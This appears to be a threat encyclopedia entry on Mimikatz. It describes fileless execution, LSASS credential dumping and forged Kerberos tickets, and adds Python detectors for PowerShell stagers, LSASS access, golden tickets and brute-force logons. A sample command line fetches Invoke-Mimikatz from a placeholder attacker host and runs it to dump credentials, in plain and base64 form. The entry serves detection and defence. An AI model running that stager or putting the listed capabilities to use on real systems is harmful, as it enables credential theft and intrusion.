Threat behavior
Installation
A PowerShell script (Invoke-Mimikatz.ps1) lets an attacker run this threat remotely and filelessly. Fileless execution loads a binary into a process's address space without ever writing it to disk. Because the binary never touches the file system, file-scanning antivirus solutions do not see it; detection has to rely on what the script does in memory and on the command lines and script blocks PowerShell logs.
In a typical credential harvesting scenario, the attacker runs a PowerShell command on the victim's device that downloads the script from a server the attacker controls. The downloaded script then uses reflective DLL injection to load the threat into memory and run it, without writing any file to the compromised device's disk. The attacker can then use the threat remotely to steal credentials and certificates and to collect data from the compromised host.
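The download-and-run stager described above usually arrives as a single powershell.exe command line, often hidden behind -EncodedCommand (base64 of UTF-16LE text). The following added example, which is not part of this page or of the Mimikatz project, scores process command lines (for example from Windows event 4688 or EDR telemetry) against indicators of that cradle and decodes the encoded form first so that encoding does not hide it. The host attacker.example, the sample command lines and the indicator list are constructed for the example.

```python
import base64
import re

# Indicator patterns for the stager the page describes: a download cradle that
# fetches Invoke-Mimikatz.ps1, evaluates it in memory, then dumps credentials.
INDICATORS = {
    "invoke-mimikatz": re.compile(r"invoke-mimikatz", re.I),
    "download-cradle": re.compile(r"\.download(?:string|file)\s*\(", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "reflective-load": re.compile(r"invoke-reflectivepeinjection|\[reflection\.assembly\]::load", re.I),
    "sekurlsa-module": re.compile(r"sekurlsa::", re.I),
}

# -EncodedCommand and the abbreviations PowerShell accepts; the argument is
# base64 of the script encoded as UTF-16LE.
ENCODED_FLAG = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command(cmdline):
    """Score one process command line; returns encoded flag, decoded payload and indicator hits."""
    decoded = decode_encoded_command(cmdline)
    # Match both the raw line and the decoded payload, so that encoding the
    # cradle does not hide it from the indicator patterns.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pattern in INDICATORS.items() if pattern.search(text)]
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits}


# Constructed samples (not real telemetry); attacker.example is a placeholder host.
STAGER = (
    "IEX (New-Object Net.WebClient).DownloadString("
    "'http://attacker.example/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
)
ENCODED_STAGER = base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")

SAMPLE_COMMAND_LINES = [
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "' + STAGER + '"',
    "powershell.exe -NoP -W Hidden -Enc " + ENCODED_STAGER,
    'powershell.exe -Command "Get-ChildItem C:\\Users | Measure-Object"',
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        result = analyze_command(line)
        print(result["indicators"] or "clean", "(encoded)" if result["encoded"] else "", line[:60])
```

The third sample is a benign command line and produces no hits; the first two produce the same three hits, which is the point of decoding before matching. In production the indicator list is a starting point, and script block logging (event 4104) should be scored the same way, because a stager can be split across several short command lines.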
Payload
This threat can:
- Recover and export Windows passwords in clear text by injecting a DLL into lsass.exe or reading its memory
- Export security certificates
- Fileless execution through PowerShell
- Inject DLLs into running processes
- List running system and user processes
- Obtain all process tokens
- Impersonate a token
- Get a list with loaded kernel drivers
- Get a table with all service calls and corresponding kernel modules names
- Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
- BSOD the machine
- Modify privileges
- Bypass some Group Policy settings
- Disable some security and event monitoring services
- Bypass Microsoft AppLocker / Software Restriction Policies
- Gather critical data about security and instrumentation software running on the host.
Recover and export Windows credentials
This threat can dump credentials from LSASS (the Local Security Authority Subsystem Service, lsass.exe) including:
- NT LAN Manager (NTLM) password hashes
- LAN Manager password hashes
- Kerberos password, ekeys, tickets, and PIN
- TsPkg (password)
- WDigest (clear-text password)
- LiveSSP (clear-text password)
- SSP (clear-text password)
- DPAPI hashes and keys
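Whether the threat reads lsass.exe memory or injects a DLL into it, it must first open a handle to the process, and Sysmon Event ID 10 (ProcessAccess) records that handle request with the source image, the access mask granted and a call trace. The following added example, which is not part of this page or of the Mimikatz project, classifies such events: a mask containing PROCESS_VM_READ matches the credential dump pattern, a mask containing write or thread-creation rights matches the injection pattern, and UNKNOWN frames in the call trace mean the caller ran from memory not backed by a module on disk, which is what a reflectively loaded DLL looks like. The allowlist of legitimate lsass clients and all sample events are constructed for the example and must be tuned per environment.

```python
# Process access rights (winnt.h) relevant to credential theft from lsass.exe
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Assumed allowlist of images that legitimately open lsass.exe on the reference
# build; an assumption for this example, not a vetted list.
ALLOWLISTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def classify_lsass_access(event):
    """Return findings for one Sysmon Event ID 10 record (dict); an empty list means benign."""
    if event.get("EventID") != 10:
        return []
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return []
    if event["SourceImage"].lower() in ALLOWLISTED_SOURCES:
        return []
    granted = int(event["GrantedAccess"], 16)
    findings = []
    if granted & PROCESS_VM_READ:
        findings.append("reads lsass memory (credential dump pattern)")
    if granted & (PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD):
        findings.append("write/thread access to lsass (DLL injection pattern)")
    # Sysmon prints UNKNOWN(address) for return addresses with no backing module.
    if "UNKNOWN" in event.get("CallTrace", ""):
        findings.append("call trace from unbacked memory (reflective/in-memory code)")
    return findings


def scan(events):
    """Return (source image, granted access, findings) for every suspicious event."""
    results = []
    for ev in events:
        findings = classify_lsass_access(ev)
        if findings:
            results.append((ev["SourceImage"], ev["GrantedAccess"], findings))
    return results


# Constructed sample events (offsets and addresses are made up for the example).
SAMPLE_EVENTS = [
    {   # mimikatz.exe run from a temp path: read-only access to lsass
        "EventID": 10,
        "SourceImage": r"C:\Users\user\AppData\Local\Temp\mimikatz.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1010",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|C:\Windows\System32\KERNELBASE.dll+2c56e|C:\Users\user\AppData\Local\Temp\mimikatz.exe+3f2a1",
    },
    {   # Invoke-Mimikatz inside powershell.exe: write access and unbacked frames
        "EventID": 10,
        "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1438",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|C:\Windows\System32\KERNELBASE.dll+2c56e|UNKNOWN(000001E2C4A71F3C)|UNKNOWN(000001E2C4A6E0B2)",
    },
    {   # Defender engine opening lsass: allowlisted
        "EventID": 10,
        "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
        "TargetImage": r"C:\Windows\system32\lsass.exe",
        "GrantedAccess": "0x1010",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204|C:\Windows\System32\KERNELBASE.dll+2c56e",
    },
    {   # access to another process: out of scope
        "EventID": 10,
        "SourceImage": r"C:\Windows\explorer.exe",
        "TargetImage": r"C:\Windows\System32\notepad.exe",
        "GrantedAccess": "0x1410",
        "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d204",
    },
]

if __name__ == "__main__":
    for source, access, findings in scan(SAMPLE_EVENTS):
        print(source, access, "; ".join(findings))
```

Keying on the access mask rather than on the image name is deliberate: the binary is frequently renamed (see the process names listed below), but it cannot read lsass memory without PROCESS_VM_READ.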
Creates the following processes:
- "C:\Users\<USER>\AppData\Local\Temp\mimikatz.exe"
- %SAMPLEPATH%\mimikatz.exe
- C:\Windows\System32\wuapihost.exe
- C:\Windows\System32\UI0Detect.exe
- C:\Users\user\Desktop\software.exe
Mimikatz communicates with the following hosts:
- a83f[:]8110:0:0:d8ff:ffff:766b:e00
- a83f[:]8110:0:0:700:700:2800:4000
- a83f[:]8110:cce1:d301:10:0:0:0
- a83f[:]8110:0:0:1b00:100:2800:0
- 192[.]229.211.108:80
- a83f[:]8110:0:0:1b02:0:0:0
- a83f[:]8110:0:0:2000:0:0:0
- a83f[:]8110:0:0:f084:e4d8:7b02:0
- a83f[:]8110:0:0:4c8e:21:0:0
- a83f[:]8110:6f77:2054:4350:2049:6e05:4600
- a83f[:]8110:0:0:64ca:1f00:0:0
- a83f[:]8110:0:0:23f2:a224:8094:db01
- a83f[:]8110:d3a4:48ff:d5a5:46ff:d5a5:46ff
- 218[.]85.157.99:53
- fp2e7a[.]wpc.2be4.phicdn[.]net
- fp2e7a[.]wpc.phicdn[.]net
This malware also accesses or downloads from the following URLs:
- hxxp://repository.certum[.]pl/ctnca[.]cer
It can also:
- Generate Kerberos Golden Tickets: forged TGTs encrypted with the krbtgt account's key, for any account name and lifetime the attacker chooses (Kerberos TGT logon token ticket attack)
- Generate Kerberos Silver Tickets: forged service tickets encrypted with the target service account's key, presented directly to the service without contacting a domain controller (Kerberos TGS service ticket attack)
- Export certificates and keys
- Dump cached credentials
- Stop event monitoring
- Patch the terminal server service (ts module) to allow multiple concurrent RDP sessions
- Bypass basic group policy objects
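A golden ticket is never issued by the KDC, so the domain controller logs a 4769 service ticket request for an account that has no preceding 4768 TGT request (or 4770 renewal) from that client, and the forged ticket may carry an account name that does not exist at all. The following added example, which is not part of this page or of the Mimikatz project, correlates DC security log records on those two points. The event field names, the account list and the sample records are constructed for the example; the 10 hour value is the default maximum TGT lifetime in Kerberos policy and should be read from the domain policy in practice.

```python
from datetime import datetime, timedelta

# Default maximum TGT lifetime; after this a client must renew (4770) or obtain
# a new TGT (4768) before the KDC will issue it further service tickets.
TGT_LIFETIME = timedelta(hours=10)


def find_forged_tgt_use(events, known_accounts, tgt_lifetime=TGT_LIFETIME):
    """Flag 4769 requests for which the KDC logs show no TGT issued to that user from that IP.

    events: DC security log records as dicts with keys id, time (datetime),
    user, ip, status and, for 4769, service. known_accounts: lower-case
    sAMAccountNames that exist in the directory.
    """
    last_tgt = {}  # (user, ip) -> time of the last successful 4768/4770
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        key = (ev["user"].lower(), ev["ip"])
        if ev["id"] in (4768, 4770) and ev["status"] == "0x0":
            last_tgt[key] = ev["time"]
        elif ev["id"] == 4769 and ev["status"] == "0x0":
            reasons = []
            issued = last_tgt.get(key)
            if issued is None or ev["time"] - issued > tgt_lifetime:
                reasons.append("service ticket requested with no TGT issued or renewed by the KDC")
            if key[0] not in known_accounts:
                reasons.append("account name does not exist in the directory")
            if reasons:
                findings.append({"time": ev["time"], "user": ev["user"], "ip": ev["ip"],
                                 "service": ev["service"], "reasons": reasons})
    return findings


def _t(text):
    return datetime.fromisoformat(text)


# Constructed sample data: accounts and records are made up for the example.
KNOWN_ACCOUNTS = {"alice", "bob", "svc-sql"}

SAMPLE_EVENTS = [
    # alice logs on normally: TGT first, then a service ticket a few minutes later
    {"id": 4768, "time": _t("2024-05-01T08:55:00"), "user": "alice", "ip": "10.0.0.5", "status": "0x0"},
    {"id": 4769, "time": _t("2024-05-01T09:02:00"), "user": "alice", "ip": "10.0.0.5", "status": "0x0",
     "service": "cifs/fileserver"},
    # bob's last real TGT was 17 hours before a new service ticket request from another host
    {"id": 4768, "time": _t("2024-04-30T20:00:00"), "user": "bob", "ip": "10.0.0.9", "status": "0x0"},
    {"id": 4769, "time": _t("2024-05-01T13:10:00"), "user": "bob", "ip": "10.0.0.9", "status": "0x0",
     "service": "ldap/dc01"},
    # a name that exists nowhere in the directory asks for a service ticket
    {"id": 4769, "time": _t("2024-05-01T13:12:00"), "user": "ghost-admin", "ip": "10.0.0.9", "status": "0x0",
     "service": "cifs/dc01"},
]

if __name__ == "__main__":
    for f in find_forged_tgt_use(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(f["time"], f["user"], f["ip"], f["service"], "|", "; ".join(f["reasons"]))
```

Two practical caveats: the 4768/4770/4769 records of every domain controller must be merged before correlating, because the TGT may have been issued by a different DC than the one that issued the service ticket; and a silver ticket never touches a DC at all, so it produces neither event. The only trace of a silver ticket is the 4624 logon on the target host, which has to be compared against the DC 4769 records in the same way.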
Prevention
Guidance for end users
For more tips on how to keep your device safe, go to the Microsoft security help & learning portal.
- Do not open files from unknown sources
- Do not click links from unknown sources
To learn more about preventing trojans or other malware from affecting individual devices, read about preventing malware infection.
Guidance for enterprise administrators
Ransomware attacks enterprises more often than individuals, and this tool is commonly used during such intrusions to harvest credentials for lateral movement. Following the mitigation steps below can help prevent ransomware attacks:
- Keep backups so you can recover data affected by ransomware and destructive attacks. Use controlled folder access to prevent unauthorized applications from modifying protected files.
- Harden internet-facing assets and ensure they have the latest security updates. Use threat and vulnerability management to audit these assets regularly for vulnerabilities, misconfigurations, and suspicious activity.
- Secure Remote Desktop Gateway using solutions like Azure Multi-Factor Authentication (MFA). If you don’t have an MFA gateway, enable network-level authentication (NLA).
- Monitor for brute-force attempts. Check excessive failed authentication attempts (Windows security event ID 4625).
- Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
- Turn on attack surface reduction rules, including rules that block ransomware activity and other activities associated with human adversaries. To assess the impact of these rules, deploy them in audit mode.
- Utilize the Microsoft Defender Firewall and your network firewall to prevent RPC and SMB communication among endpoints whenever possible. This limits lateral movement as well as other attack activities.
- Turn on tamper protection features to prevent attackers from stopping security services.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Office 365 ATP customers should ensure that Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email and watering holes, and reporting of reconnaissance attempts and other suspicious activity.
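The brute-force monitoring step above ("excessive failed authentication attempts", event ID 4625) needs a definition of excessive, and a count per account misses password spraying, where the attacker tries one password against many accounts. The following added example, which is not part of this page, keeps a sliding window of 4625 events per source IP and raises one alert when the window reaches a threshold, labelling it a spray when the failures are spread over many accounts and a brute force when they concentrate on one. The window, threshold, field names and sample records (TEST-NET addresses) are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)   # assumed sliding window
THRESHOLD = 10                  # assumed failures per window that trigger an alert


def detect_failed_logon_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Alert once per source IP when 4625 failures in a sliding window reach the threshold.

    events: dicts with keys id, time (datetime), user, ip. Failures against one
    account are reported as a brute force; failures spread over many accounts
    as a password spray.
    """
    recent = defaultdict(deque)  # ip -> (time, user) pairs inside the window
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] != 4625:
            continue
        in_window = recent[ev["ip"]]
        in_window.append((ev["time"], ev["user"].lower()))
        while ev["time"] - in_window[0][0] > window:
            in_window.popleft()
        if len(in_window) >= threshold and ev["ip"] not in alerted:
            users = {u for _, u in in_window}
            kind = "password spray" if len(users) > len(in_window) // 2 else "brute force"
            alerts.append({"ip": ev["ip"], "failures": len(in_window),
                           "distinct_users": len(users), "kind": kind, "at": ev["time"]})
            alerted.add(ev["ip"])
    return alerts


# Constructed sample records (not real logs).
BASE = datetime.fromisoformat("2024-05-01T03:00:00")


def _failure(seconds, user, ip):
    return {"id": 4625, "time": BASE + timedelta(seconds=seconds), "user": user, "ip": ip}


SAMPLE_EVENTS = (
    # twelve failures against one account in two minutes
    [_failure(10 * i, "administrator", "203.0.113.7") for i in range(12)]
    # one failure each against ten different accounts in three minutes
    + [_failure(20 * i, f"user{i:02d}", "198.51.100.4") for i in range(10)]
    # a user who mistypes a password three times: below threshold
    + [_failure(60 * i, "alice", "10.0.0.5") for i in range(3)]
    # a successful logon, which the detector ignores
    + [{"id": 4624, "time": BASE + timedelta(seconds=200), "user": "alice", "ip": "10.0.0.5"}]
)

if __name__ == "__main__":
    for alert in detect_failed_logon_bursts(SAMPLE_EVENTS):
        print(alert["at"], alert["ip"], alert["kind"], alert["failures"], "failures,",
              alert["distinct_users"], "accounts")
```

The alert fires on the event that crosses the threshold, so the spray alert reports exactly ten failures across ten accounts while the brute force reports ten failures against one. For RDP specifically, the logon type in the 4625 record (3 for network, 10 for RemoteInteractive) is worth carrying into the alert so that the Remote Desktop Gateway hardening step above can be prioritised by what is actually being attacked.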